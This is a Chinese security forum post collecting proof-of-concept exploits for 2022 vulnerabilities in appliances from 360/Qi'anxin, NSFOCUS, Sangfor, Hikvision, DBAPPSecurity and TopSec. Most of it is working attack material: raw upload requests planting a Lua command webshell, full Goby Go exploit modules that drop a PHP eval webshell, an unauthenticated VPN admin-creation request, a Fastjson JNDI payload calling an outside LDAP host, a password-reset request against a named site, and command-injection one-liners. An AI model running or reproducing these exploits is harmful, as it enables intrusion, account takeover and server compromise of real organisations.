DecoyMini 技术交流社区

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 11261|回复: 0

[2022] 设备漏洞 PoC 整理

[复制链接]

188

主题

35

回帖

30

荣誉

Rank: 9Rank: 9Rank: 9

UID
2
积分
354
精华
1
沃币
2 枚
注册时间
2021-6-24

论坛管理

发表于 2022-8-4 11:58:04 | 显示全部楼层 |阅读模式
本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!

1、360 天擎任意文件上传


/api/client_upload_file.json 存在任意文件上传漏洞

  1. POST /api/client_upload_file.json?mid=12345678901234567890123456789012&md5=123456
  2. 78901234567890123456789012&filename=../../lua/123.LUAC HTTP/1.1
  3. Host: 192.168.11.210
  4. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15
  5. (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
  6. Content-Length: 323
  7. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91ox
  8. Q
  9. Referer: http://192.168.11.210
  10. Accept-Encoding: gzip
  11. ------WebKitFormBoundaryLx7ATxHThfk91oxQ
  12. Content-Disposition: form-data; name="file"; filename="flash.php"
  13. Content-Type: application/xxxx
  14. if ngx.req.get_uri_args().cmd then
  15. cmd = ngx.req.get_uri_args().cmd
  16. local t = io.popen(cmd)
  17. local a = t:read("*all")
  18. ngx.say(a)
  19. end------WebKitFormBoundaryLx7ATxHThfk91oxQ--
复制代码

2、网康科技网关 RCE


/scripts/aitrain.php

3、绿盟下一代防火墙任意文件上传漏洞


resourse.php

  1. package exploits

  2. import (
  3.   "fmt"
  4.   "git.gobies.org/goby/goscanner/goutils"
  5.   "git.gobies.org/goby/goscanner/jsonvul"
  6.   "git.gobies.org/goby/goscanner/scanconfig"
  7.   "git.gobies.org/goby/httpclient"
  8.   "net/url"
  9.   "strings"
  10.   "time"
  11. )

  12. func init() {
  13.   expJson := `{
  14.       "Name": "nsfocus resourse.php arbitrary file upload vulnerability",
  15.       "Description": "<p>NSFOCUS Next Generation Firewall is a dedicated security firewall device.<br></p><p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
  16.       "Product": "nsfocus",
  17.   "Homepage": "https://www.nsfocus.com.cn/",
  18.   "DisclosureDate": "2022-07-18",
  19.   "Author": "LittleBlack",
  20.   "FofaQuery": "banner="PHPSESSID_NF" || header="PHPSESSID_NF"",
  21.   "GobyQuery": "banner="PHPSESSID_NF" || header="PHPSESSID_NF"",
  22.   "Level": "3",
  23.       "Impact": "<p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
  24.       "Recommendation": "<p>1. Block 8081 port access. 2. Pay attention to the update of the official website in time: <a href="https://www.nsfocus.com.cn/">https://www.nsfocus.com.cn/</a><br></p>",
  25.   "References": [
  26.     "https://fofa.so/"
  27.   ],
  28.   "Is0day": false,
  29.   "HasExp": true,
  30.   "ExpParams": [
  31.     {
  32.       "name": "cmd",
  33.       "type": "input",
  34.       "value": "system('id');",
  35.       "show": ""
  36.     }
  37.   ],
  38.   "ExpTips": {
  39.     "Type": "",
  40.     "Content": ""
  41.   },
  42.   "ScanSteps": [
  43.     "AND",
  44.     {
  45.       "Request": {
  46.         "method": "GET",
  47.         "uri": "/test.php",
  48.         "follow_redirect": true,
  49.         "header": {},
  50.         "data_type": "text",
  51.         "data": ""
  52.       },
  53.       "ResponseTest": {
  54.         "type": "group",
  55.         "operation": "AND",
  56.         "checks": [
  57.           {
  58.             "type": "item",
  59.             "variable": "$code",
  60.             "operation": "==",
  61.             "value": "200",
  62.             "bz": ""
  63.           },
  64.           {
  65.             "type": "item",
  66.             "variable": "$body",
  67.             "operation": "contains",
  68.             "value": "test",
  69.             "bz": ""
  70.           }
  71.         ]
  72.       },
  73.       "SetVariable": []
  74.     }
  75.   ],
  76.   "ExploitSteps": [
  77.     "AND",
  78.     {
  79.       "Request": {
  80.         "method": "GET",
  81.         "uri": "/test.php",
  82.         "follow_redirect": true,
  83.         "header": {},
  84.         "data_type": "text",
  85.         "data": ""
  86.       },
  87.       "ResponseTest": {
  88.         "type": "group",
  89.         "operation": "AND",
  90.         "checks": [
  91.           {
  92.             "type": "item",
  93.             "variable": "$code",
  94.             "operation": "==",
  95.             "value": "200",
  96.             "bz": ""
  97.           },
  98.           {
  99.             "type": "item",
  100.             "variable": "$body",
  101.             "operation": "contains",
  102.             "value": "test",
  103.             "bz": ""
  104.           }
  105.         ]
  106.       },
  107.       "SetVariable": []
  108.     }
  109.   ],
  110.    "VulType": [
  111.         "Code Execution"
  112.       ],
  113.       "Tags": [
  114.         "Code Execution"
  115.       ],
  116.   "CVEIDs": [
  117.     ""
  118.   ],
  119.   "CNNVD": [
  120.     ""
  121.   ],
  122.   "CNVD": [
  123.     ""
  124.   ],
  125.   "CVSSScore": "9.5",
  126.   "Translation": {
  127.     "CN": {
  128.       "Name": "绿盟下一代防火墙 resourse.php 任意文件上传漏洞",
  129.       "Product": "绿盟下一代防火墙",
  130.       "Description": "<p>绿盟下一代防火墙是一款专用安全防火墙设备。<br></p><p>绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞,攻击者可上传恶意木马,获取服务器权限。<br></p>",
  131.       "Recommendation": "<p>1、阻拦8081端口访问。2、及时关注官网更新:<a href="https://www.nsfocus.com.cn/">https://www.nsfocus.com.cn/</a><br></p>",
  132.       "Impact": "<p>绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞,攻击者可上传恶意木马,获取服务器权限。<br></p>",
  133.       "VulType": [
  134.         "代码执⾏"
  135.       ],
  136.       "Tags": [
  137.         "代码执⾏"
  138.       ]
  139.     },
  140.     "EN": {
  141.       "Name": "nsfocus resourse.php 任意文件上传漏洞",
  142.       "Product": "nsfocus",
  143.       "Description": "<p>NSFOCUS Next Generation Firewall is a dedicated security firewall device.<br></p><p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
  144.       "Recommendation": "<p>1. Block 8081 port access. 2. Pay attention to the update of the official website in time: <a href="https://www.nsfocus.com.cn/">https://www.nsfocus.com.cn/</a><br></p>",
  145.       "Impact": "<p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>",
  146.       "VulType": [
  147.         "Code Execution"
  148.       ],
  149.       "Tags": [
  150.         "Code Execution"
  151.       ]
  152.     }
  153.   },
  154.   "AttackSurfaces": {
  155.     "Application": null,
  156.     "Support": null,
  157.     "Service": null,
  158.     "System": null,
  159.     "Hardware": null
  160.   }
  161. }`

  162.   ExpManager.AddExploit(NewExploit(
  163.     goutils.GetFileName(),
  164.     expJson,
  165.     func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {

  166.       u1 := httpclient.NewFixUrl("https://" + u.IP + ":8081")
  167.       uri1 := "/api/v1/device/bugsInfo"
  168.       cfg1 := httpclient.NewPostRequestConfig(uri1)
  169.       cfg1.VerifyTls = false
  170.       cfg1.FollowRedirect = false
  171.       cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9")
  172.       cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9\r\nContent-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac71"\r\n\r\nlang|s:52:"../../../../../../../../../../../../../../../../tmp/";\r\n--1d52ba2a11ad8a915eddab1a0e85acd9--\r\n"
  173.       if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") {
  174.         time.Sleep(time.Second * 5)
  175.         uri2 := "/api/v1/device/bugsInfo"
  176.         cfg2 := httpclient.NewPostRequestConfig(uri2)
  177.         cfg2.VerifyTls = false
  178.         cfg2.FollowRedirect = false
  179.         cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef")
  180.         cfg2.Data = "--4803b59d015026999b45993b1245f0ef\r\nContent-Disposition: form-data; name="file"; filename="compose.php"\r\n\r\n<?php eval($_POST[1]);?>\r\n--4803b59d015026999b45993b1245f0ef--\r\n"
  181.         if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") {
  182.           u3 := httpclient.NewFixUrl("https://" + u.IP + ":4433")
  183.           uri3 := "/mail/include/header_main.php"
  184.           cfg3 := httpclient.NewPostRequestConfig(uri3)
  185.           cfg3.VerifyTls = false
  186.           cfg3.FollowRedirect = false
  187.           cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71")
  188.           cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded")
  189.           cfg3.Data = "1=print+md5%281%29%3B"
  190.           if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil {
  191.             return resp3.StatusCode == 200 && strings.Contains(resp3.RawBody, "c4ca4238a0b923820dcc509a6f75849b")
  192.           }

  193.         }
  194.       }

  195.       return false
  196.     },
  197.     func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
  198.       cmd := ss.Params["cmd"].(string)

  199.       u1 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":8081")
  200.       uri1 := "/api/v1/device/bugsInfo"
  201.       cfg1 := httpclient.NewPostRequestConfig(uri1)
  202.       cfg1.VerifyTls = false
  203.       cfg1.FollowRedirect = false
  204.       cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9")
  205.       cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9\r\nContent-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac71"\r\n\r\nlang|s:52:"../../../../../../../../../../../../../../../../tmp/";\r\n--1d52ba2a11ad8a915eddab1a0e85acd9--\r\n"
  206.       if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") {
  207.         time.Sleep(time.Second * 5)
  208.         uri2 := "/api/v1/device/bugsInfo"
  209.         cfg2 := httpclient.NewPostRequestConfig(uri2)
  210.         cfg2.VerifyTls = false
  211.         cfg2.FollowRedirect = false
  212.         cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef")
  213.         cfg2.Data = "--4803b59d015026999b45993b1245f0ef\r\nContent-Disposition: form-data; name="file"; filename="compose.php"\r\n\r\n<?php eval($_POST[1]);?>\r\n--4803b59d015026999b45993b1245f0ef--\r\n"
  214.         if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") {
  215.           u3 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":4433")
  216.           uri3 := "/mail/include/header_main.php"
  217.           cfg3 := httpclient.NewPostRequestConfig(uri3)
  218.           cfg3.VerifyTls = false
  219.           cfg3.FollowRedirect = false
  220.           cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71")
  221.           cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded")
  222.           cfg3.Data = fmt.Sprintf("1=%s", url.QueryEscape(cmd))
  223.           if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil && resp3.StatusCode == 200 {
  224.             expResult.Output = resp3.RawBody
  225.             expResult.Success = true
  226.           }

  227.         }
  228.       }
  229.       return expResult
  230.     },
  231.   ))
  232. }
复制代码

4、深信服 VPN 任意用户添加漏洞


用户管理接口的权限控制出现漏洞,攻击者可任意添加用户

  1. POST /cgi-bin/php-cgi/html/delegatemodule/HttpHandler.php?controler=User&action=AddUser&token=e52021a4c9c962ac9cc647effddcf57242d152d9 HTTP/1.1
  2. Host: xxxxxx
  3. Cookie:language=zh_CN;sinfor_session_id=W730120C88755A7D932019B349CCAC63;PHPSESSID=cb12753556d734509d4092baabfb55dd;x-anti-csrf-gcs=A7DBB1DC0050737E;usermrgstate=%7B%22params%22%3A%7B%22grpid%22%3A%22-1%22%2C%22recflag%22%3A0%2C%22filter%22%3A0%7D%2C%22pageparams%22%3A%7B%22start%22%3A0%2C%22limit%22%3A25%7D%2C%22otherparams%22%3A%7B%22searchtype%22%3A0%2C%22recflag%22%3Afalse%7D%7D;hidecfg=%7B%22name%22%3Afalse%2C%22flag%22%3Afalse%2C%22note%22%3Afalse%2C%22expire%22%3Atrue%2C%22lastlogin_time%22%3Atrue%2C%22phone%22%3Atrue%2C%22allocateip%22%3Atrue%2C%22other%22%3Afalse%2C%22state%22%3Afalse%7D
  4. Content-Length: 707
  5. Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
  6. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  7. X-Requested-With: XMLHttpRequest
  8. Sec-Ch-Ua-Mobile: ?0
  9. User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
  10. Sec-Ch-Ua-Platform: "macOS"
  11. Accept: */*
  12. Origin: https://xxxxxx
  13. X-Forwarded-For: 127.0.0.1
  14. X-Originating-Ip: 127.0.0.1
  15. X-Remote-Ip: 127.0.0.1
  16. X-Remote-Addr: 127.0.0.1
  17. Sec-Fetch-Site: same-origin
  18. Sec-Fetch-Mode: cors
  19. Sec-Fetch-Dest: empty
  20. Referer: https://xxxxxx/html/tpl/userMgt.html?userid=0&groupid=-1&createRole=1
  21. Accept-Encoding: gzip, deflate
  22. Accept-Language: zh-CN,zh;q=0.9
  23. Connection: close

  24. name=admin1&note=admin1&passwd=Admin%40123&passwd2=Admin%40123&phone=&grpid=-1&grptext=%2F%E9%BB%98%E8%AE%A4%E7%94%A8%E6%88%B7%E7%BB%84&selectAll=1&b_inherit_auth=1&b_inherit_grpolicy=1&is_Autoip=1&allocateip=0.0.0.0&gqsj=1&ex_time=2027-07-29&is_enable=1&is_public=1&is_pwd=1&first_psw_type=-1&second_server=&auth_type=0&ext_auth_id=&token_svr_id=%E8%AF%B7%E9%80%89%E6%8B%A9&grpolicy_id=0&grpolicytext=%E9%BB%98%E8%AE%A4%E7%AD%96%E7%95%A5%E7%BB%84&roleid=&roletext=&year=&month=&day=&isBindKey=&userid=0&crypto_key=&szcername=&caid=-1&certOpt=0&create_time=&sec_key=&first_psw_name=%E6%9C%AC%E5%9C%B0%E6%95%B0%E6%8D%AE%E5%BA%93&first_psw_id=&second_psw_name=&second_psw_id=&is_extauth=0&secondAuthArr=%5B%5D
复制代码

5、海康威视综合运营管理平台 RCE 漏洞


URL:

  1. /bic/ssoService/v1/applyCT
复制代码

Payload:

  1. {"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.dnstunnel.run","autoCommit":true}}
复制代码

6、安恒明御网关注入


  1. /webui/?g=aaa_portal_auth_config_reset&type=1
复制代码

7、安恒数据大脑 API 网关任意密码重置漏洞


在前端代码中包含重置密码的连接以及密码加密方式

安恒数据大脑 API (https://www.websaas.cn/) 存在任意密码重置漏洞

这里以网站 https://waf-mgmt.pinganyun.com/q/#/ 为例,在前端代码中包含重置密码的连接以及密码加密方式,按照前端代码说明,构造重置密码数据包

此处重置的密码为:p@ssw0rd

  1. POST /q/common-permission/public/users/forgetPassword HTTP/1.1
  2. Host: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
  4. Accept-Language: en-US,en;q=0.5
  5. Content-type: application/json
  6. Accept-Encoding: gzip, deflate
  7. Connection: close
  8. Upgrade-Insecure-Requests: 1
  9. Content-Length: 104
  10. {"code":XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX,"rememberMe":false,"use
  11. rname":"admin","password":"XXXXXXXXXXXXXXXXXXXXXXXXXX"}
复制代码

8、奇安信 天擎安全管理系统 getshell


client_upload_file.json

  1. package exploits

  2. import (
  3.   "fmt"
  4.   "git.gobies.org/goby/goscanner/goutils"
  5.   "git.gobies.org/goby/goscanner/jsonvul"
  6.   "git.gobies.org/goby/goscanner/scanconfig"
  7.   "git.gobies.org/goby/httpclient"
  8.   "strings"
  9. )

  10. func init() {
  11.   expJson := `{
  12.   "Name": "QiAnXin Tianqing terminal security management system client_upload_file.json getshell",
  13.   "Description": "There is an arbitrary file upload vulnerability in QiAnXin Tianqing terminal security management system, and the attacker can upload his own webshell to control the server.",
  14.   "Product": "360-TianQing",
  15.   "Homepage": "https://www.qianxin.com/product/detail/pid/49",
  16.   "DisclosureDate": "2021-04-09",
  17.   "Author": "itardc@163.com",
  18.   "FofaQuery": "app="360-TianQing"",
  19.   "GobyQuery": "app="360-TianQing"",
  20.   "Level": "3",
  21.   "Impact": "",
  22.   "Recommendation": "",
  23.   "References": [
  24.     "http://fofa.so"
  25.   ],
  26.   "HasExp": true,
  27.   "ExpParams": [
  28.     {
  29.       "name": "cmd",
  30.       "type": "input",
  31.       "value": "whoami"
  32.     }
  33.   ],
  34.   "ExpTips": {
  35.     "Type": "",
  36.     "Content": ""
  37.   },
  38.   "ScanSteps": [
  39.     "AND",
  40.     {
  41.       "Request": {
  42.         "data": "",
  43.         "data_type": "text",
  44.         "follow_redirect": true,
  45.         "method": "GET",
  46.         "uri": "/"
  47.       },
  48.       "ResponseTest": {
  49.         "checks": [
  50.           {
  51.             "bz": "",
  52.             "operation": "==",
  53.             "type": "item",
  54.             "value": "200",
  55.             "variable": "$code"
  56.           }
  57.         ],
  58.         "operation": "AND",
  59.         "type": "group"
  60.       }
  61.     }
  62.   ],
  63.   "ExploitSteps": null,
  64.   "Tags": ["getshell"],
  65.   "CVEIDs": null,
  66.   "CVSSScore": "0.0",
  67.   "AttackSurfaces": {
  68.     "Application": ["360-TianQing"],
  69.     "Support": null,
  70.     "Service": null,
  71.     "System": null,
  72.     "Hardware": null
  73.   }
  74. }`

  75.   ExpManager.AddExploit(NewExploit(
  76.     goutils.GetFileName(),
  77.     expJson,
  78.     func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
  79.       randomFilename := goutils.RandomHexString(4)
  80.       cfg := httpclient.NewPostRequestConfig(fmt.Sprintf("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=3cb95cfbe1035bce8c448fcaf80fe7d9&filename=../../lua/%s.LUAC", randomFilename))
  81.       cfg.VerifyTls = false
  82.       cfg.FollowRedirect = false
  83.       cfg.Header.Store("Referer", u.FixedHostInfo)
  84.       cfg.Header.Store("Cookie", "SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B")
  85.       cfg.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ")
  86.       cfg.Data = "------WebKitFormBoundaryLx7ATxHThfk91oxQ\r\n"
  87.       cfg.Data += "Content-Disposition: form-data; name="file"; filename="flash.php"\r\n"
  88.       cfg.Data += "Content-Type: application/xxxx\r\n\r\n"
  89.       cfg.Data += "hello,world\r\n"
  90.       cfg.Data += "------WebKitFormBoundaryLx7ATxHThfk91oxQ--"
  91.       if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil && resp.StatusCode == 200 {
  92.         return strings.Contains(resp.Utf8Html, ""status":true") &&
  93.           strings.Contains(resp.Utf8Html, "upload file success")
  94.       }
  95.       return false
  96.     },
  97.     func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
  98.       randomFilename := goutils.RandomHexString(4)
  99.       cfg := httpclient.NewPostRequestConfig(fmt.Sprintf("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/%s.LUAC", randomFilename))
  100.       //cfg := httpclient.NewPostRequestConfig("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/sky.LUAC")
  101.       cfg.VerifyTls = false
  102.       cfg.FollowRedirect = false
  103.       cfg.Header.Store("Referer", expResult.HostInfo.FixedHostInfo)
  104.       cfg.Header.Store("Cookie", "SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B")
  105.       cfg.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ")
  106.       cfg.Data = "------WebKitFormBoundaryLx7ATxHThfk91oxQ\r\n"
  107.       cfg.Data += "Content-Disposition: form-data; name="file"; filename="flash.php"\r\n"
  108.       cfg.Data += "Content-Type: application/xxxx\r\n\r\n"
  109.       cfg.Data += "if ngx.req.get_uri_args().cmd then\r\n"
  110.       cfg.Data += "cmd = ngx.req.get_uri_args().cmd\r\n"
  111.       cfg.Data += "local t = io.popen(cmd)\r\n"
  112.       cfg.Data += "local a = t:read("*all")\r\n"
  113.       cfg.Data += "ngx.say(a)\r\n"
  114.       cfg.Data += "end\r\n"
  115.       cfg.Data += "------WebKitFormBoundaryLx7ATxHThfk91oxQ--"
  116.       httpclient.DoHttpRequest(expResult.HostInfo, cfg)
  117.       cmd := ss.Params["cmd"].(string)
  118.       if resp, err := httpclient.SimpleGet(expResult.HostInfo.FixedHostInfo + fmt.Sprintf("/api/%s.json?cmd=%s", randomFilename, cmd)); err == nil && resp.StatusCode == 200 {
  119.         expResult.Success = true
  120.         expResult.Output = resp.Utf8Html
  121.       }
  122.       return expResult
  123.     },
  124.   ))
  125. }
复制代码

9、天融信 - 上网行为管理系统 RCE


一句话:

  1. /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0a
复制代码

Base64 版:

  1. /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20PD9waHAgcGhwaW5mbygpOz8+%20%7Cbase64%20-d%20%3E%3E%20/var/www/html/1.php%0a
复制代码

  1. package exploits

  2. import (
  3.   "git.gobies.org/goby/goscanner/goutils"
  4.   "git.gobies.org/goby/goscanner/jsonvul"
  5.   "git.gobies.org/goby/goscanner/scanconfig"
  6.   "git.gobies.org/goby/httpclient"
  7.   "net/url"
  8.   "strings"
  9. )

  10. func init() {
  11.   expJson := `{"Name":"TopSec TopACM Remote Command Execution","Description":"<p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p><p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p>","Product":"TopSec-TopACM","Homepage":"https://www.topsec.com.cn/product/27.html","DisclosureDate":"2022-07-28","Author":"su18@javaweb.org","FofaQuery":"body="ActiveXObject" && body="name=\\"dkey_login\\" " && body="repeat-x left top"","GobyQuery":"body="ActiveXObject" && body="name=\\"dkey_login\\" " && body="repeat-x left top"","Level":"3","Impact":"<p><span style="color: rgb(22, 28, 37); font-size: 16px;">There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</span><br></p>","Recommendation":"<p><span style="color: rgb(0, 0, 0); font-size: 16px;">At present, the manufacturer has not released a security patch. Please pay attention to the official update.<a href="https://www.topsec.com.cn/product/27.html" target="_blank">https://www.topsec.com.cn/product/27.html</a></span><br></p>","References":["https://mp.weixin.qq.com/s/5UMEIrDiG5hQFofByYH78g"],"Is0day":false,"HasExp":true,"ExpParams":[{"name":"cmd","type":"input","value":"echo%20PD9waHAgcGhwaW5mbygpOw==%20|base64%20-d%20%3E/var/www/html/3.php","show":""}],"ExpTips":{"Type":"","Content":""},"ScanSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":false,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"ExploitSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":true,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"Tags":["Command Execution"],"VulType":["Command Execution"],"CVEIDs":[""],"CNNVD":[""],"CNVD":[""],"CVSSScore":"9.8","Translation":{"CN":{"Name":"天融信上网行为管理系统命令执行","Product":"天融信-上网行为管理系统","Description":"<p>天融信上网行为管理系统(TopACM)综合考虑各行业客户需求,为客户提供安全策略、链路负载、身份认证、流量管理、行为管控、上网审计、日志追溯、网监对接、用户行为分析、VPN等实用功能。产品具有良好的网络适应性并满足《网络安全法》、公安部151号令、等保2.0等关于用户行为审计和日志留存的相关要求。目前产品广泛应用于政府、教育、能源、企业、运营商等各类行业,协助客户规范网络、提高工作效率、挖掘数据价值。<br></p><p>天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。<br></p>","Recommendation":"<p>目前厂商还未发布安全补丁,请关注官方更新。<a href="https://www.topsec.com.cn/product/27.html" target="_blank">https://www.topsec.com.cn/product/27.html</a></p>","Impact":"<p><span style="color: rgb(22, 28, 37); font-size: 16px;">天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。</span><br></p>","VulType":["命令执⾏"],"Tags":["命令执⾏"]},"EN":{"Name":"TopSec TopACM Remote Command Execution","Product":"TopSec-TopACM","Description":"<p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p><p>Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.</p><p>There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p>","Recommendation":"<p><span style="color: rgb(0, 0, 0); font-size: 16px;">At present, the manufacturer has not released a security patch. Please pay attention to the official update.<a href="https://www.topsec.com.cn/product/27.html" target="_blank">https://www.topsec.com.cn/product/27.html</a></span><br></p>","Impact":"<p><span style="color: rgb(22, 28, 37); font-size: 16px;">There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</span><br></p>","VulType":["Command Execution"],"Tags":["Command Execution"]}},"AttackSurfaces":{"Application":null,"Support":null,"Service":null,"System":null,"Hardware":null}}`

  12.   exploitTopACM092348783482 := func(cmd string, host *httpclient.FixUrl) bool {
  13.     // 攻击 URL
  14.     requestConfig := httpclient.NewGetRequestConfig("/view/IPV6/naborTable/static_convert.php?blocks[0]=|%20" + url.QueryEscape(cmd))
  15.     requestConfig.VerifyTls = false
  16.     requestConfig.FollowRedirect = false
  17.     requestConfig.Timeout = 15

  18.     // 发送攻击请求
  19.     if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
  20.       if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "ip -6 neigh del") {
  21.         return true
  22.       }
  23.     }
  24.     return false
  25.   }

